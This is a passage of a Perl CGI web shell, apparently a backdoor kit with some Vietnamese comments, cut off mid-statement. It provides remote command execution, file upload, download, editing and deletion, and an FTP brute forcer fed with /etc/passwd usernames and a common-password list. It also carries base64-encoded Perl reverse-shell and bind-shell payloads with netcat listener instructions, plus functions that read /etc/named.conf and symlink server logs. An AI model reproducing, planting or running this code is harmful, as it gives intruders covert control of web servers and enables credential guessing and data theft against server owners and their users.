5187<br><font size='6' color=red>Killed it!</font>
5188END
5189 }
5190}
5191
5192
5193
5194#------------------------------------------------------------------------------
5195# This function displays the page that contains a link which allows the user
5196# to download the specified file. The page also contains a auto-refresh
5197# feature that starts the download automatically.
5198# Argument 1: Fully qualified filename of the file to be downloaded
5199#------------------------------------------------------------------------------
5200sub PrintDownloadLinkPage
5201{
5202 local($FileUrl) = @_;
5203 my $result="";
5204 if(-e $FileUrl) # if the file exists
5205 {
5206 # encode the file link so we can send it to the browser
5207 $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
5208 $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
5209 $HtmlMetaHeader = "<meta hxxp-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
5210 &PrintPageHeader("c");
5211 $result .= <<END;
5212Sending File $TransferFile...<br>
5213
5214If the download does not start automatically,
5215<a href="$DownloadLink">Click Here</a>
5216END
5217 $result .= &PrintCommandLineInputForm;
5218 }
5219 else # file doesn't exist
5220 {
5221 $result .= "Failed to download $FileUrl: $!";
5222 $result .= &PrintFileDownloadForm;
5223 }
5224 return $result;
5225}
5226
5227#------------------------------------------------------------------------------
5228# This function reads the specified file from the disk and sends it to the
5229# browser, so that it can be downloaded by the user.
5230# Argument 1: Fully qualified pathname of the file to be sent.
5231#------------------------------------------------------------------------------
5232sub SendFileToBrowser
5233{
5234 my $result = "";
5235 local($SendFile) = @_;
5236 if(open(SENDFILE, $SendFile)) # file opened for reading
5237 {
5238 if($WinNT)
5239 {
5240 binmode(SENDFILE);
5241 binmode(STDOUT);
5242 }
5243 $FileSize = (stat($SendFile))[7];
5244 ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
5245 print "Content-Type: application/x-unknown\n";
5246 print "Content-Length: $FileSize\n";
5247 print "Content-Disposition: attachment; filename=$1\n\n";
5248 print while(<SENDFILE>);
5249 close(SENDFILE);
5250 exit(1);
5251 }
5252 else # failed to open file
5253 {
5254 $result .= "Failed to download $SendFile: $!";
5255 $result .=&PrintFileDownloadForm;
5256 }
5257 return $result;
5258}
5259
5260
5261#------------------------------------------------------------------------------
5262# This function is called when the user downloads a file. It displays a message
5263# to the user and provides a link through which the file can be downloaded.
5264# This function is also called when the user clicks on that link. In this case,
5265# the file is read and sent to the browser.
5266#------------------------------------------------------------------------------
5267sub BeginDownload
5268{
5269 # get fully qualified path of the file to be downloaded
5270 if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
5271 (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
5272 {
5273 $TargetFile = $TransferFile;
5274 }
5275 else # path is relative
5276 {
5277 chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
5278 $TargetFile .= $PathSep.$TransferFile;
5279 }
5280
5281 if($Options eq "go") # we have to send the file
5282 {
5283 &SendFileToBrowser($TargetFile);
5284 }
5285 else # we have to send only the link page
5286 {
5287 &PrintDownloadLinkPage($TargetFile);
5288 }
5289}
5290
5291#------------------------------------------------------------------------------
5292# This function is called when the user wants to upload a file. If the
5293# file is not specified, it displays a form allowing the user to specify a
5294# file, otherwise it starts the upload process.
5295#------------------------------------------------------------------------------
5296sub UploadFile
5297{
5298 # if no file is specified, print the upload form again
5299 if($TransferFile eq "")
5300 {
5301 return &PrintFileUploadForm;
5302
5303 }
5304 my $result="";
5305 # start the uploading process
5306 $result .= "Uploading $TransferFile to $CurrentDir...<br>";
5307
5308 # get the fullly qualified pathname of the file to be created
5309 chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
5310 $TransferFile =~ m!([^/^\\]*)$!;
5311 $TargetName .= $PathSep.$1;
5312
5313 $TargetFileSize = length($in{'filedata'});
5314 # if the file exists and we are not supposed to overwrite it
5315 if(-e $TargetName && $Options ne "overwrite")
5316 {
5317 $result .= "Failed: Destination file already exists.<br>";
5318 }
5319 else # file is not present
5320 {
5321 if(open(UPLOADFILE, ">$TargetName"))
5322 {
5323 binmode(UPLOADFILE) if $WinNT;
5324 print UPLOADFILE $in{'filedata'};
5325 close(UPLOADFILE);
5326 $result .= "Transfered $TargetFileSize Bytes.<br>";
5327 $result .= "File Path: $TargetName<br>";
5328 }
5329 else
5330 {
5331 $result .= "Failed: $!<br>";
5332 }
5333 }
5334 $result .= &PrintCommandLineInputForm;
5335 return $result;
5336}
5337
5338#------------------------------------------------------------------------------
5339# This function is called when the user wants to download a file. If the
5340# filename is not specified, it displays a form allowing the user to specify a
5341# file, otherwise it displays a message to the user and provides a link
5342# through which the file can be downloaded.
5343#------------------------------------------------------------------------------
5344sub DownloadFile
5345{
5346 # if no file is specified, print the download form again
5347 if($TransferFile eq "")
5348 {
5349 &PrintPageHeader("f");
5350 return &PrintFileDownloadForm;
5351 }
5352
5353 # get fully qualified path of the file to be downloaded
5354 if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
5355 {
5356 $TargetFile = $TransferFile;
5357 }
5358 else # path is relative
5359 {
5360 chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
5361 $TargetFile .= $PathSep.$TransferFile;
5362 }
5363
5364 if($Options eq "go") # we have to send the file
5365 {
5366 return &SendFileToBrowser($TargetFile);
5367 }
5368 else # we have to send only the link page
5369 {
5370 return &PrintDownloadLinkPage($TargetFile);
5371 }
5372}
5373
5374
5375#------------------------------------------------------------------------------
5376# This function is called to execute commands. It displays the output of the
5377# command and allows the user to enter another command. The change directory
5378# command is handled differently. In this case, the new directory is stored in
5379# an internal variable and is used each time a command has to be executed. The
5380# output of the change directory command is not displayed to the users
5381# therefore error messages cannot be displayed.
5382#------------------------------------------------------------------------------
5383sub ExecuteCommand
5384{
5385 my $result="";
5386 if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
5387 {
5388 # we change the directory internally. The output of the
5389 # command is not displayed.
5390 $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
5391 chop($CurrentDir = `$Command`);
5392 $result .= &PrintCommandLineInputForm;
5393
5394 $result .= "Command: <run>$RunCommand </run><br><textarea cols='$cols' rows='$rows' spellcheck='false'>";
5395 # xuat thong tin khi chuyen den 1 thu muc nao do!
5396 $RunCommand= $WinNT?"dir":"dir -lia";
5397 $result .= &RunCmd;
5398 }elsif($RunCommand =~ m/^\s*edit\s+(.+)/)
5399 {
5400 $result .= &SaveFileForm;
5401 }else
5402 {
5403 $result .= &PrintCommandLineInputForm;
5404 $result .= "Command: <run>$RunCommand</run><br><textarea id='data' cols='$cols' rows='$rows' spellcheck='false'>";
5405 $result .=&RunCmd;
5406 }
5407 $result .= "</textarea>";
5408 return $result;
5409}
5410
5411#------------------------------------------------------------------------
5412# run command
5413#------------------------------------------------------------------------
5414
5415sub RunCmd
5416{
5417 my $result="";
5418 $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
5419 if(!$WinNT)
5420 {
5421 $SIG{'ALRM'} = \&CommandTimeout;
5422 alarm($CommandTimeoutDuration);
5423 }
5424 if($ShowDynamicOutput) # show output as it is generated
5425 {
5426 $|=1;
5427 $Command .= " |";
5428 open(CommandOutput, $Command);
5429 while(<CommandOutput>)
5430 {
5431 $_ =~ s/(\n|\r\n)$//;
5432 $result .= &HtmlSpecialChars("$_\n");
5433 }
5434 $|=0;
5435 }
5436 else # show output after command completes
5437 {
5438 $result .= &HtmlSpecialChars('$Command');
5439 }
5440 if(!$WinNT)
5441 {
5442 alarm(0);
5443 }
5444 return $result;
5445}
5446#==============================================================================
5447# Form Save File
5448#==============================================================================
5449sub SaveFileForm
5450{
5451 my $result ="";
5452 substr($RunCommand,0,5)="";
5453 my $file=&trim($RunCommand);
5454 $save='<br><input name="a" type="submit" value="save" class="submit" >';
5455 $File=$CurrentDir.$PathSep.$RunCommand;
5456 my $dir="<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("gui")."</span>";
5457 if(-w $File)
5458 {
5459 $rows="23"
5460 }else
5461 {
5462 $msg="<br><font style='font: 15pt Verdana; color: yellow;' > Permission denied!<font><br>";
5463 $rows="20"
5464 }
5465 $Prompt = $WinNT ? "$dir > " : "<font color='#FFFFFF'>[admin\@$ServerName $dir]\$</font> ";
5466 $read=($WinNT)?"type":"less";
5467 $RunCommand = "$read \"$RunCommand\"";
5468 $result .= <<END;
5469 <form name="f" method="POST" action="$ScriptLocation">
5470
5471 <input type="hidden" name="d" value="$CurrentDir">
5472 $Prompt
5473 <input type="text" size="40" name="c">
5474 <input name="s" class="submit" type="submit" value="Enter">
5475 <br>Command: <run> $RunCommand </run>
5476 <input type="hidden" name="file" value="$file" > $save <br> $msg
5477 <br><textarea id="data" name="data" cols="$cols" rows="$rows" spellcheck="false">
5478END
5479
5480 $result .= &RunCmd;
5481 $result .= "</textarea>";
5482 $result .= "</form>";
5483 return $result;
5484}
5485#==============================================================================
5486# Save File
5487#==============================================================================
5488sub SaveFile($)
5489{
5490 my $Data= shift ;
5491 my $File= shift;
5492 $File=$CurrentDir.$PathSep.$File;
5493 if(open(FILE, ">$File"))
5494 {
5495 binmode FILE;
5496 print FILE $Data;
5497 close FILE;
5498 return 1;
5499 }else
5500 {
5501 return 0;
5502 }
5503}
5504#------------------------------------------------------------------------------
5505# Brute Forcer Form
5506#------------------------------------------------------------------------------
5507sub BruteForcerForm
5508{
5509 my $result="";
5510 $result .= <<END;
5511
5512<table>
5513
5514<tr>
5515<td colspan="2" align="center">
5516####################################<br>
5517Simple FTP brute forcer<br>
5518####################################
5519<form name="f" method="POST" action="$ScriptLocation">
5520
5521<input type="hidden" name="a" value="bruteforcer"/>
5522</td>
5523</tr>
5524<tr>
5525<td>User:<br><textarea rows="18" cols="30" name="user">
5526END
5527chop($result .= `less /etc/passwd | cut -d: -f1`);
5528$result .= <<'END';
5529</textarea></td>
5530<td>
5531
5532Pass:<br>
5533<textarea rows="18" cols="30" name="pass">123pass
5534123!@#
5535123admin
5536123abc
5537123456admin
55381234554321
553912344321
5540pass123
5541admin
5542admincp
5543administrator
5544matkhau
5545passadmin
5546p@ssword
5547p@ssw0rd
5548password
5549123456
55501234567
555112345678
5552123456789
55531234567890
5554111111
5555000000
5556222222
5557333333
5558444444
5559555555
5560666666
5561777777
5562888888
5563999999
5564123123
5565234234
5566345345
5567456456
5568567567
5569678678
5570789789
5571123321
5572456654
5573654321
55747654321
557587654321
5576987654321
55770987654321
5578admin123
5579admin123456
5580abcdef
5581abcabc
5582!@#!@#
5583!@#$%^
5584!@#$%^&*(
5585!@#$$#@!
5586abc123
5587anhyeuem
5588iloveyou</textarea>
5589</td>
5590</tr>
5591<tr>
5592<td colspan="2" align="center">
5593Sleep:<select name="sleep">
5594
5595<option>0</option>
5596<option>1</option>
5597<option>2</option>
5598
5599<option>3</option>
5600</select>
5601<input type="submit" class="submit" value="Brute Forcer"/></td></tr>
5602</form>
5603</table>
5604END
5605return $result;
5606}
5607#------------------------------------------------------------------------------
5608# Brute Forcer
5609#------------------------------------------------------------------------------
5610sub BruteForcer
5611{
5612 my $result="";
5613 $Server=$ENV{'SERVER_ADDR'};
5614 if($in{'user'} eq "")
5615 {
5616 $result .= &BruteForcerForm;
5617 }else
5618 {
5619 use Net::FTP;
5620 @user= split(/\n/, $in{'user'});
5621 @pass= split(/\n/, $in{'pass'});
5622 chomp(@user);
5623 chomp(@pass);
5624 $result .= "<br><br>[+] Trying brute $ServerName<br>====================>>>>>>>>>>>><<<<<<<<<<====================<br><br>\n";
5625 foreach $username (@user)
5626 {
5627 if(!($username eq ""))
5628 {
5629 foreach $password (@pass)
5630 {
5631 $ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n";
5632 if($ftp->login("$username","$password"))
5633 {
5634 $result .= "<a target='_blank' href='ftp://$username:$password\@$Server'>[+] ftp://$username:$password\@$Server</a><br>\n";
5635 $ftp->quit();
5636 break;
5637 }
5638 if(!($in{'sleep'} eq "0"))
5639 {
5640 sleep(int($in{'sleep'}));
5641 }
5642 $ftp->quit();
5643 }
5644 }
5645 }
5646 $result .= "\n<br>==========>>>>>>>>>> Finished <<<<<<<<<<==========<br>\n";
5647 }
5648 return $result;
5649}
5650#------------------------------------------------------------------------------
5651# Backconnect Form
5652#------------------------------------------------------------------------------
5653sub BackBindForm
5654{
5655 return <<END;
5656 <br><br>
5657
5658 <table>
5659 <tr>
5660 <form name="f" method="POST" action="$ScriptLocation">
5661 <td>BackConnect: <input type="hidden" name="a" value="backbind"></td>
5662 <td> Host: <input type="text" size="20" name="clientaddr" value="$ENV{'REMOTE_ADDR'}">
5663 Port: <input type="text" size="7" name="clientport" value="80" onkeyup="document.getElementById('ba').innerHTML=this.value;"></td>
5664
5665 <td><input name="s" class="submit" type="submit" name="submit" value="Connect"></td>
5666 </form>
5667 </tr>
5668 <tr>
5669 <td colspan=3><font color=#FFFFFF>[+] Client listen before connect back!
5670 <br>[+] Try check your Port with <a target="_blank" href="hxxp://www.canyouseeme.org/">hxxp://www.canyouseeme.org/</a>
5671 <br>[+] Client listen with command: <run>nc -vv -l -p <span id="ba">80</span></run></font></td>
5672
5673 </tr>
5674 </table>
5675
5676 <br><br>
5677 <table>
5678 <tr>
5679 <form method="POST" action="$ScriptLocation">
5680 <td>Bind Port: <input type="hidden" name="a" value="backbind"></td>
5681
5682 <td> Port: <input type="text" size="15" name="clientport" value="1412" onkeyup="document.getElementById('bi').innerHTML=this.value;">
5683
5684 Password: <input type="text" size="15" name="bindpass" value="THIEUGIABUON"></td>
5685 <td><input name="s" class="submit" type="submit" name="submit" value="Bind"></td>
5686 </form>
5687 </tr>
5688 <tr>
5689 <td colspan=3><font color=#FFFFFF>[+] Chuc nang chua dc test!
5690 <br>[+] Try command: <run>nc $ENV{'SERVER_ADDR'} <span id="bi">1412</span></run></font></td>
5691
5692 </tr>
5693 </table><br>
5694END
5695}
5696#------------------------------------------------------------------------------
5697# Backconnect use perl
5698#------------------------------------------------------------------------------
5699sub BackBind
5700{
5701 use MIME::Base64;
5702 use Socket;
5703 $backperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCiRTaGVsbAk9ICIvYmluL2Jhc2giOw0KJEFSR0M9QEFSR1Y7DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoInRjcCIpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0XG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsNCnByaW50ICJDb25uZWN0ZWQhIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiLS09PSBDb25uZWN0ZWQgQmFja2Rvb3IgPT0tLSAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAnWytdIFN5c3RlbWluZm86ICc7IHVuYW1lIC1hO2VjaG87ZWNobyAnWytdIFVzZXJpbmZvOiAnOyBpZDtlY2hvO2VjaG8gJ1srXSBEaXJlY3Rvcnk6ICc7IHB3ZDtlY2hvOyBlY2hvICdbK10gU2hlbGw6ICc7JFNoZWxsIik7DQpjbG9zZSBTT0NLRVQ7";
5704 $bindperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJEFSR0M9QEFSR1Y7DQokcG9ydAk9ICRBUkdWWzBdOw0KJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0KJFNoZWxsCT0gIi9iaW4vYmFzaCI7DQpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKW9yIGRpZSAic29ja2V0OiQhIjsNCnNldHNvY2tvcHQoU0VSVkVSLCBTT0xfU09DS0VULCBTT19SRVVTRUFERFIsIHBhY2soImwiLCAxKSlvciBkaWUgInNldHNvY2tvcHQ6ICQhIjsNCmJpbmQoU0VSVkVSLCBzb2NrYWRkcl9pbigkcG9ydCwgSU5BRERSX0FOWSkpb3IgZGllICJiaW5kOiAkISI7DQpsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pCQlvciBkaWUgImxpc3RlbjogJCEiOw0KZm9yKDsgJHBhZGRyID0gYWNjZXB0KENMSUVOVCwgU0VSVkVSKTsgY2xvc2UgQ0xJRU5UKQ0Kew0KCW9wZW4oU1RESU4sICI+JkNMSUVOVCIpOw0KCW9wZW4oU1RET1VULCAiPiZDTElFTlQiKTsNCglvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7DQoJc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gJ1srXSBTeXN0ZW1pbmZvOiAnOyB1bmFtZSAtYTtlY2hvO2VjaG8gJ1srXSBVc2VyaW5mbzogJzsgaWQ7ZWNobztlY2hvICdbK10gRGlyZWN0b3J5OiAnOyBwd2Q7ZWNobzsgZWNobyAnWytdIFNoZWxsOiAnOyRTaGVsbCIpOw0KCWNsb3NlKFNURElOKTsNCgljbG9zZShTVERPVVQpOw0KCWNsb3NlKFNUREVSUik7DQp9DQo=";
5705
5706 $ClientAddr = $in{'clientaddr'};
5707 $ClientPort = int($in{'clientport'});
5708 if($ClientPort eq 0)
5709 {
5710 return &BackBindForm;
5711 }elsif(!$ClientAddr eq "")
5712 {
5713 $Data=decode_base64($backperl);
5714 if(-w "/tmp/")
5715 {
5716 $File="/tmp/backconnect.pl";
5717 }else
5718 {
5719 $File=$CurrentDir.$PathSep."backconnect.pl";
5720 }
5721 open(FILE, ">$File");
5722 print FILE $Data;
5723 close FILE;
5724 system("perl backconnect.pl $ClientAddr $ClientPort");
5725 unlink($File);
5726 exit 0;
5727 }else
5728 {
5729 $Data=decode_base64($bindperl);
5730 if(-w "/tmp")
5731 {
5732 $File="/tmp/bindport.pl";
5733 }else
5734 {
5735 $File=$CurrentDir.$PathSep."bindport.pl";
5736 }
5737 open(FILE, ">$File");
5738 print FILE $Data;
5739 close FILE;
5740 system("perl bindport.pl $ClientPort");
5741 unlink($File);
5742 exit 0;
5743 }
5744}
5745#------------------------------------------------------------------------------
5746# Array List Directory
5747#------------------------------------------------------------------------------
5748sub RmDir($)
5749{
5750 my $dir = shift;
5751 if(opendir(DIR,$dir))
5752 {
5753 while($file = readdir(DIR))
5754 {
5755 if(($file ne ".") && ($file ne ".."))
5756 {
5757 $file= $dir.$PathSep.$file;
5758 if(-d $file)
5759 {
5760 &RmDir($file);
5761 }
5762 else
5763 {
5764 unlink($file);
5765 }
5766 }
5767 }
5768 closedir(DIR);
5769 }
5770 if(!rmdir($dir))
5771 {
5772
5773 }
5774}
5775sub FileOwner($)
5776{
5777 my $file = shift;
5778 if(-e $file)
5779 {
5780 ($uid,$gid) = (stat($file))[4,5];
5781 if($WinNT)
5782 {
5783 return "???";
5784 }
5785 else
5786 {
5787 $name=getpwuid($uid);
5788 $group=getgrgid($gid);
5789 return $name."/".$group;
5790 }
5791 }
5792 return "???";
5793}
5794sub ParentFolder($)
5795{
5796 my $path = shift;
5797 my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd;
5798 chop($path = `$Comm`);
5799 return $path;
5800}
5801sub FilePerms($)
5802{
5803 my $file = shift;
5804 my $ur = "-";
5805 my $uw = "-";
5806 if(-e $file)
5807 {
5808 if($WinNT)
5809 {
5810 if(-r $file){ $ur = "r"; }
5811 if(-w $file){ $uw = "w"; }
5812 return $ur . " / " . $uw;
5813 }else
5814 {
5815 $mode=(stat($file))[2];
5816 $result = sprintf("%04o", $mode & 07777);
5817 return $result;
5818 }
5819 }
5820 return "0000";
5821}
5822sub FileLastModified($)
5823{
5824 my $file = shift;
5825 if(-e $file)
5826 {
5827 ($la) = (stat($file))[9];
5828 ($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1];
5829 $y = $y + 1900;
5830 @month = qw/1 2 3 4 5 6 7 8 9 10 11 12/;
5831 $lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i);
5832 return $lmtime;
5833 }
5834 return "???";
5835}
5836sub FileSize($)
5837{
5838 my $file = shift;
5839 if(-f $file)
5840 {
5841 return -s $file;
5842 }
5843 return "0";
5844
5845}
5846sub ParseFileSize($)
5847{
5848 my $size = shift;
5849 if($size <= 1024)
5850 {
5851 return $size. " B";
5852 }
5853 else
5854 {
5855 if($size <= 1024*1024)
5856 {
5857 $size = sprintf("%.02f",$size / 1024);
5858 return $size." KB";
5859 }
5860 else
5861 {
5862 $size = sprintf("%.2f",$size / 1024 / 1024);
5863 return $size." MB";
5864 }
5865 }
5866}
5867sub trim($)
5868{
5869 my $string = shift;
5870 $string =~ s/^\s+//;
5871 $string =~ s/\s+$//;
5872 return $string;
5873}
5874sub AddSlashes($)
5875{
5876 my $string = shift;
5877 $string=~ s/\\/\\\\/g;
5878 return $string;
5879}
5880sub ListDir
5881{
5882 my $path = $CurrentDir.$PathSep;
5883 $path=~ s/\\\\/\\/g;
5884 my $result = "<form name='f' action='$ScriptLocation'><span style='font: 11pt Verdana; font-weight: bold;'>Path: [ ".&AddLinkDir("gui")." ] </span><input type='text' name='d' size='40' value='$CurrentDir' /><input type='hidden' name='a' value='gui'><input class='submit' type='submit' value='Change'></form>";
5885 if(-d $path)
5886 {
5887 my @fname = ();
5888 my @dname = ();
5889 if(opendir(DIR,$path))
5890 {
5891 while($file = readdir(DIR))
5892 {
5893 $f=$path.$file;
5894 if(-d $f)
5895 {
5896 push(@dname,$file);
5897 }
5898 else
5899 {
5900 push(@fname,$file);
5901 }
5902 }
5903 closedir(DIR);
5904 }
5905 @fname = sort { lc($a) cmp lc($b) } @fname;
5906 @dname = sort { lc($a) cmp lc($b) } @dname;
5907 $result .= "<div><table width='90%' class='listdir'>
5908
5909 <tr style='background-color: #3e3e3e'><th>File Name</th>
5910 <th style='width:100px;'>File Size</th>
5911 <th style='width:150px;'>Owner</th>
5912 <th style='width:100px;'>Permission</th>
5913 <th style='width:150px;'>Last Modified</th>
5914 <th style='width:260px;'>Action</th></tr>";
5915 my $style="line";
5916 my $i=0;
5917 foreach my $d (@dname)
5918 {
5919 $style= ($style eq "line") ? "notline": "line";
5920 $d = &trim($d);
5921 $dirname=$d;
5922 if($d eq "..")
5923 {
5924 $d = &ParentFolder($path);
5925 }
5926 elsif($d eq ".")
5927 {
5928 $d = $path;
5929 }
5930 else
5931 {
5932 $d = $path.$d;
5933 }
5934 $result .= "<tr class='$style'>
5935
5936 <td id='File_$i' style='font: 11pt Verdana; font-weight: bold;'><a href='?a=gui&d=".$d."'>[ ".$dirname." ]</a></td>";
5937 $result .= "<td>DIR</td>";
5938 $result .= "<td style='text-align:center;'>".&FileOwner($d)."</td>";
5939 $result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($d)."','".$dirname."')\" ><span onclick=\"chmod_form(".$i.",'".$dirname."')\" >".&FilePerms($d)."</span></td>";
5940 $result .= "<td style='text-align:center;'>".&FileLastModified($d)."</td>";
5941 $result .= "<td style='text-align:center;'><a href='javascript:return false;' onclick=\"rename_form($i,'$dirname','".&AddSlashes(&AddSlashes($d))."')\">Rename</a> | <a onclick=\"if(!confirm('Remove dir: $dirname ?')) { return false;}\" href='?a=gui&d=$path&remove=$dirname'>Remove</a></td>";
5942 $result .= "</tr>";
5943 $i++;
5944 }
5945 foreach my $f (@fname)
5946 {
5947 $style= ($style eq "line") ? "notline": "line";
5948 $file=$f;
5949 $f = $path.$f;
5950 $view = "?dir=".$path."&view=".$f;
5951 $result .= "<tr class='$style'><td id='File_$i' style='font: 11pt Verdana;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>".$file."</a></td>";
5952 $result .= "<td>".&ParseFileSize(&FileSize($f))."</td>";
5953 $result .= "<td style='text-align:center;'>".&FileOwner($f)."</td>";
5954 $result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($f)."','".$file."')\" ><span onclick=\"chmod_form($i,'$file')\" >".&FilePerms($f)."</span></td>";
5955 $result .= "<td style='text-align:center;'>".&FileLastModified($f)."</td>";
5956 $result .= "<td style='text-align:center;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>Edit</a> | <a href='javascript:return false;' onclick=\"rename_form($i,'$file','f')\">Rename</a> | <a href='?a=download&o=go&f=".$f."'>Download</a> | <a onclick=\"if(!confirm('Remove file: $file ?')) { return false;}\" href='?a=gui&d=$path&remove=$file'>Remove</a></td>";
5957 $result .= "</tr>";
5958 $i++;
5959 }
5960 $result .= "</table></div>";
5961 }
5962 return $result;
5963}
5964#------------------------------------------------------------------------------
5965# Try to View List User
5966#------------------------------------------------------------------------------
5967sub ViewDomainUser
5968{
5969 open (domains, '/etc/named.conf') or $err=1;
5970 my @cnzs = <domains>;
5971 close d0mains;
5972 my $style="line";
5973 my $result="<h5><font style='font: 15pt Verdana;color: #ff9900;'>Hoang Sa - Truong Sa</font></h5>";
5974 if ($err)
5975 {
5976 $result .= ('<p>C0uldn\'t Bypass it , Sorry</p>');
5977 return $result;
5978 }else
5979 {
5980 $result .= '<table><tr><th>Domains</th> <th>User</th></tr>';
5981 }
5982 foreach my $one (@cnzs)
5983 {
5984 if($one =~ m/.*?zone "(.*?)" {/)
5985 {
5986 $style= ($style eq "line") ? "notline": "line";
5987 $filename= "/etc/valiases/".$one;
5988 $owner = getpwuid((stat($filename))[4]);
5989 $result .= '<tr class="$style" width=50%><td>'.$one.' </td><td> '.$owner.'</td></tr>';
5990 }
5991 }
5992 $result .= '</table>';
5993 return $result;
5994}
5995#------------------------------------------------------------------------------
5996# View Log
5997#------------------------------------------------------------------------------
5998sub ViewLog
5999{
6000 if($WinNT)
6001 {
6002 return "<h2><font style='font: 20pt Verdana;color: #ff9900;'>Don't run on Windows</font></h2>";
6003 }
6004 my $result="<table><tr><th>Path Log</th><th>Submit</th></tr>";
6005 my @pathlog=(
6006 '/usr/local/apache/logs/error_log',
6007 '/var/log/hxxpd/error_log',
6008 '/usr/local/apache/logs/access_log'
6009 );
6010 my $i=0;
6011 my $perms;
6012 my $sl;
6013 foreach my $log (@pathlog)
6014 {
6015 if(-w $log)
6016 {
6017 $perms="OK";
6018 }else
6019 {
6020 chop($sl = `ln -s $log error_log_$i`);
6021 if(&trim($ls) eq "")
6022 {
6023 if(-r $ls)
6024 {
6025 $perms="OK";
6026 $log="error_log_".$i;
6027 }
6028 }else
6029 {
6030 $perms="<font style='color: red;'>Cancel<font>";
6031 }
6032 }
6033 $result .=<<END;
6034 <tr>
6035
6036 <form action="" method="post">
6037 <td><input type="text" onkeyup="document.getElementById('log_$i').value='less ' + this.value;" value="$log" size='50'/></td>
6038 <td><input class="submit" type="submit" value="Try" /></td>
6039 <input type="hidden" id="log_$i" name="c" value="less $log"/>
6040 <input type="hidden" name="a" value="command" />
6041 <input type="hidden" name="d" value="$CurrentDir" />
6042 </form>
6043 <td>$perms</td>
6044
6045 </tr>
6046END
6047 $i++;
6048 }
6049 $result .="</table>";
6050 return $result;
6051}
6052#------------------------------------------------------------------------------
6053# Main Program - Execution Starts Here
6054#------------------------------------------------------------------------------
6055&ReadParse;
6056&GetCookies;
6057
6058$ScriptLocation = $ENV{'SCRIPT_NAME'};
6059$ServerName = $ENV{'SERVER_NAME'};
6060$LoginPassword = $in{'p'};
6061$RunCommand = $in{'c'};
6062$TransferFile = $in{'f'};
6063$Options = $in{'o'};
6064$Action = $in{'a'};
6065
6066$Action = "command" if($Action eq ""); # no action specified, use default
6067
6068# get the directory in which the commands will be executed
6069$CurrentDir = &trim($in{'d'});
6070# mac dinh xuat thong tin neu ko co lenh nao!
6071$RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq "");
6072chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
6073
6074$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
6075
6076if($Action eq "login" || !$LoggedIn) # user needs/has to login
6077{
6078 &PerformLogin;
6079}elsif($Action eq "gui") # GUI directory
6080{
6081 &PrintPageHeader;
6082 if(!$WinNT)
6083 {
6084 $chmod=int($in{'chmod'});
6085 if(!($chmod eq 0))
6086 {
6087 $chmod=int($in{'chmod'});
6088 $file=$CurrentDir.$PathSep.$TransferFile;
6089 chop($result= `chmod $chmod "$file"`);
6090 if(&trim($result) eq "")
6091 {
6092 print "<run> Done! </run><br>";
6093 }else
6094 {
6095 print "<run> Sorry! You dont have permissions! </run><br>";
6096 }
6097 }
6098 }
6099 $rename=$in{'rename'};
6100 if(!$rename eq "")
6101 {
6102 if(rename($TransferFile,$rename))
6103 {
6104 print "<run> Done! </run><br>";
6105 }else
6106 {
6107 print "<run> Sorry! You dont have permissions! </run><br>";
6108 }
6109 }
6110 $remove=$in{'remove'};
6111 if($remove ne "")
6112 {
6113 $rm = $CurrentDir.$PathSep.$remove;
6114 if(-d $rm)
6115 {
6116 &RmDir($rm);
6117 }else
6118 {
6119 if(unlink($rm))
6120 {
6121 print "<run> Done! </run><br>";
6122 }else
